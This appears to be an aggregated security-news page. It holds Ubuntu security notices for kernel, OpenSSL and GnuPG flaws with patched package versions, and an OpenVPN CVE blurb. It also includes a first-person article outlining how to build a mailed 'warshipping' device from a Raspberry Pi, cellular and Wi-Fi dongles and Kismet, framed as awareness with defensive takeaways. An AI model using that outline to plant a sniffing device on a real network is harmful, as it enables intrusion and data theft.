Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-kvm: Linux kernel for cloud environments  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Norbert Slusarek discovered a race condition in the CAN BCM networking  
protocol of the Linux kernel leading to multiple use-after-free  
vulnerabilities. A local attacker could use this issue to execute arbitrary  
code. (CVE-2021-3609)

Likang Luo discovered that a race condition existed in the Bluetooth  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2021-3752)

It was discovered that the NFC subsystem in the Linux kernel contained a  
use-after-free vulnerability in its NFC Controller Interface (NCI)  
implementation. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2021-3760)

Szymon Heidrich discovered that the USB Gadget subsystem in the Linux  
kernel did not properly restrict the size of control requests for certain  
gadget types, leading to possible out of bounds reads or writes. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2021-39685)

It was discovered that the Ion Memory Manager subsystem in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could possibly  
use this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2021-39714)

Eric Biederman discovered that the cgroup process migration implementation  
in the Linux kernel did not perform permission checks correctly in some  
situations. A local attacker could possibly use this to gain administrative  
privileges. (CVE-2021-4197)

Lin Ma discovered that the NFC Controller Interface (NCI) implementation in  
the Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-4202)

Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in  
the Linux kernel did not perform a GPU TLB flush in some situations. A  
local attacker could use this to cause a denial of service or possibly  
execute arbitrary code. (CVE-2022-0330)

It was discovered that the PF_KEYv2 implementation in the Linux kernel did  
not properly initialize kernel memory in some situations. A local attacker  
could use this to expose sensitive information (kernel memory).  
(CVE-2022-1353)

It was discovered that the virtual graphics memory manager implementation  
in the Linux kernel was subject to a race condition, potentially leading to  
an information leak. (CVE-2022-1419)

Minh Yuan discovered that the floppy disk driver in the Linux kernel  
contained a race condition, leading to a use-after-free vulnerability. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2022-1652)

It was discovered that the Atheros ath9k wireless device driver in the  
Linux kernel did not properly handle some error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-1679)

It was discovered that the Marvell NFC device driver implementation in the  
Linux kernel did not properly perform memory cleanup operations in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system) or execute  
arbitrary code. (CVE-2022-1734)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

It was discovered that the USB Gadget file system interface in the Linux  
kernel contained a use-after-free vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-24958)

赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not  
properly perform reference counting in some error conditions. A local  
attacker could use this to cause a denial of service. (CVE-2022-28356)

It was discovered that the 8 Devices USB2CAN interface implementation in  
the Linux kernel did not properly handle certain error conditions, leading  
to a double-free. A local attacker could possibly use this to cause a  
denial of service (system crash). (CVE-2022-28388)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  linux-image-4.4.0-1110-kvm      4.4.0-1110.120  
  linux-image-kvm                 4.4.0.1110.107

Ubuntu 14.04 ESM:  
  linux-image-4.4.0-229-generic   4.4.0-229.263~14.04.1  
  linux-image-4.4.0-229-lowlatency  4.4.0-229.263~14.04.1  
  linux-image-generic-lts-xenial  4.4.0.229.199  
  linux-image-lowlatency-lts-xenial  4.4.0.229.199  
  linux-image-virtual-lts-xenial  4.4.0.229.199

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5505-1  
  CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685,  
  CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330,  
  CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679,  
  CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166,  
  CVE-2022-24958, CVE-2022-28356, CVE-2022-28388

Ubuntu Security Notice USN-5505-1

Ubuntu Security Notice 5488-2 - USN-5488-1 fixed vulnerabilities in OpenSSL. This update provides the corresponding updates for Ubuntu 16.04 ESM. Chancen and Daniel Fiala discovered that OpenSSL incorrectly handled the c_rehash script. A local attacker could possibly use this issue to execute arbitrary commands when c_rehash is run.

    ==========================================================================Ubuntu Security Notice USN-5488-2July 06, 2022openssl vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:OpenSSL could be made to crash or run programs when the c_rehash script isused.Software Description:- openssl: Secure Socket Layer (SSL) cryptographic library and toolsDetails:USN-5488-1 fixed vulnerabilities in OpenSSL. This update provides thecorresponding updates for Ubuntu 16.04 ESM.Original advisory details:  Chancen and Daniel Fiala discovered that OpenSSL incorrectly handled the  c_rehash script. A local attacker could possibly use this issue to execute  arbitrary commands when c_rehash is run.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   openssl                         1.0.2g-1ubuntu4.20+esm5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5488-2   https://ubuntu.com/security/notices/USN-5488-1   CVE-2022-2068

Ubuntu Security Notice USN-5488-2

OpenVPN Access Server 2.10 and prior versions are susceptible to resending multiple packets in a response to a reset packet sent from the client which the client again does not respond to, resulting in a limited amplification attack.

CVE-2021-4234: Access Server Release Notes | OpenVPN

Here's how I did it and how you can protect your company against such physical/digital hybrid attacks.

Most companies have strategies in place to educate employees about network security. But there has been a lot less awareness and education on how to reduce "phygital" risks — that is, physical devices that launch digital attacks against a company's computer networks.

Another name for these phygital attacks is "warshipping." Essentially, a malicious hacker creates an Internet-enabled device — for example, a miniature computer — and sends it through physical mail in an attempt to compromise a company's computer network. What's more, because so many employees have yet to return to their physical offices post-lockdown, these devices can easily sit for months unattended in unopened mail on desks and in mailrooms, gathering data and exploiting vulnerabilities in a company's network.

It's frighteningly easy and inexpensive to make your own DIY version of a warshipping device. With just three hours, a couple of hundred dollars, and a few YouTube videos, nearly anyone can do it. To show you exactly how easy it is, I'm going to talk about how I built a warshipping device and then discuss what you can do to protect your company against these attacks.

**Building a Warshipping Device**

Prepare yourselves for a bit of a technical jump into hardware and software. We don't have the space here to go into every aspect of building a warshipping device, but the following should give you a harrowing sense of exactly how easy and inexpensive the process can be.

**Building hardware.** The foundation of any warshipping device is as simple as a hobbyist circuit board not much bigger than a credit card, which can operate like a miniature computer. One example is a Raspberry Pi, which is easily found online and arrives with the required software, or at least software that can also be easily found online.

Next you need a Wi-Fi dongle of some kind so your warshipping device can connect to the Internet wirelessly. A USB Wi-Fi adapter and a memory card with at least 32 GBs of storage, along with a SIM card to enable a cellular connection and optional GPS device, will complete the hardware requirements.

**Software prerequisites.** Raspberry Pis have their own Ubuntu-based operating system (OS) called Raspberry Pi OS.

Next you'll need to establish remote access. You need to find your device's IP address so you can connect to it through your computer or another device. To do that, you can run a scan on your local network or use a smartphone app. Next enter the default password for a Raspberry Pi, which is "raspberry." You now have a functional warshipping device.

**Ready for warshipping.** At last you can install your software for warshipping. Your actual warshipping software comes in two parts: your optional GPS software if you want to keep track of your device location and Kismet or a similar network-detecting software.

Kismet acts as a packet sniffer, which finds and captures packets of data from a network to store or forward that information. So Kismet can potentially be used to grab data from your network.

Your device is now ready to cause a world of pain for some poor IT team. All you have to do is send it in the mail, and when it arrives you can access sensitive data or find a vulnerable access point for an attack via the cellular connection. Then you could join the realm of malicious hackers who are costing companies worldwide $2.9 million every minute due to cybercrime.

**Key Takeaways**

So what are some useful takeaways from all of this?

First, you need to realize that this threat isn't going away. These attacks are simply too easy to launch and too hard to address. After all, who has the time to sort through all of that incoming mail as soon as it arrives?

Second, you need to develop phygital security measures as part of your overall cybersecurity efforts. Packages can sit in mailrooms for weeks — or these days, months — before someone processes them. Any of those packages could contain a warshipping device that can use their idle time gathering data from your network. Because warshipping devices can be small enough to fit between two pieces of cardboard, even an opened empty box you're saving in the mailroom to be reused at a later date could be a threat. 

To address the issue, you can start by immediately processing packages that are incorrectly addressed, since these will get returned to the sender. But you should go beyond that to process all unopened mail as quickly as possible and never retain used packaging materials in the mailroom. You can also look into the latest mail-scanning technology, which can detect these devices while avoiding the harmful effects of X-rays.

Third, network discovery software can help you pick up on unusual traffic and detect any new devices the minute they connect to your network. That means you can potentially detect a warshipping device before any damage is done. In addition, the wave of layoffs in the recent Great Resignation, insider threats from individuals who are or formerly were authorized users in your network are just as common and may be harder to detect, since these people may have access to approved credentials and devices.

Fourth, educate your employees. They likely have no idea that packages they left on their desks for a few days while they were working remotely could have a warshipping device inside, so do them and yourselves a favor by alerting them to the possible threat.

If there's one thing you've learned from this article, it should be that the phygital world is a dangerous place. But just knowing about the danger is half the battle. So now you know.

I Built a Cheap 'Warshipping' Device in Just 3 Hours — and So Can You

Ubuntu Security Notice 5502-1 - Alex Chernyakhovsky discovered that OpenSSL incorrectly handled AES OCB mode when using the AES-NI assembly optimized implementation on 32-bit x86 platforms. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5502-1  
July 05, 2022

openssl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

OpenSSL could be made to expose sensitive information over the network.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

Alex Chernyakhovsky discovered that OpenSSL incorrectly handled AES OCB  
mode when using the AES-NI assembly optimized implementation on 32-bit  
x86 platforms. A remote attacker could possibly use this issue to obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libssl3                         3.0.2-0ubuntu1.6

Ubuntu 21.10:  
  libssl1.1                       1.1.1l-1ubuntu1.6

Ubuntu 20.04 LTS:  
  libssl1.1                       1.1.1f-1ubuntu2.16

Ubuntu 18.04 LTS:  
  libssl1.1                       1.1.1-1ubuntu2.1~18.04.20

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5502-1  
  CVE-2022-2097

Package Information:  
  https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.6  
  https://launchpad.net/ubuntu/+source/openssl/1.1.1l-1ubuntu1.6  
  https://launchpad.net/ubuntu/+source/openssl/1.1.1f-1ubuntu2.16  
  https://launchpad.net/ubuntu/+source/openssl/1.1.1-1ubuntu2.1~18.04.20

Ubuntu Security Notice USN-5502-1

Ubuntu Security Notice 5503-1 - Demi Marie Obenour discovered that GnuPG incorrectly handled injection in the status message. A remote attacker could possibly use this issue to forge signatures.

==========================================================================  
Ubuntu Security Notice USN-5503-1  
July 05, 2022

gnupg2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

GnuPG could allow forged signatures.

Software Description:  
- gnupg2: GNU privacy guard - a free PGP replacement

Details:

Demi Marie Obenour discovered that GnuPG incorrectly handled injection in  
the status message. A remote attacker could possibly use this issue to  
forge signatures.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  gnupg                           2.2.27-3ubuntu2.1  
  gnupg2                          2.2.27-3ubuntu2.1  
  gpg                             2.2.27-3ubuntu2.1

Ubuntu 21.10:  
  gnupg                           2.2.20-1ubuntu4.1  
  gnupg2                          2.2.20-1ubuntu4.1  
  gpg                             2.2.20-1ubuntu4.1

Ubuntu 20.04 LTS:  
  gnupg                           2.2.19-3ubuntu2.2  
  gnupg2                          2.2.19-3ubuntu2.2  
  gpg                             2.2.19-3ubuntu2.2

Ubuntu 18.04 LTS:  
  gnupg                           2.2.4-1ubuntu1.6  
  gnupg2                          2.2.4-1ubuntu1.6  
  gpg                             2.2.4-1ubuntu1.6

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5503-1  
  CVE-2022-34903

Package Information:  
  https://launchpad.net/ubuntu/+source/gnupg2/2.2.27-3ubuntu2.1  
  https://launchpad.net/ubuntu/+source/gnupg2/2.2.20-1ubuntu4.1  
  https://launchpad.net/ubuntu/+source/gnupg2/2.2.19-3ubuntu2.2  
  https://launchpad.net/ubuntu/+source/gnupg2/2.2.4-1ubuntu1.6

Tag

#ubuntu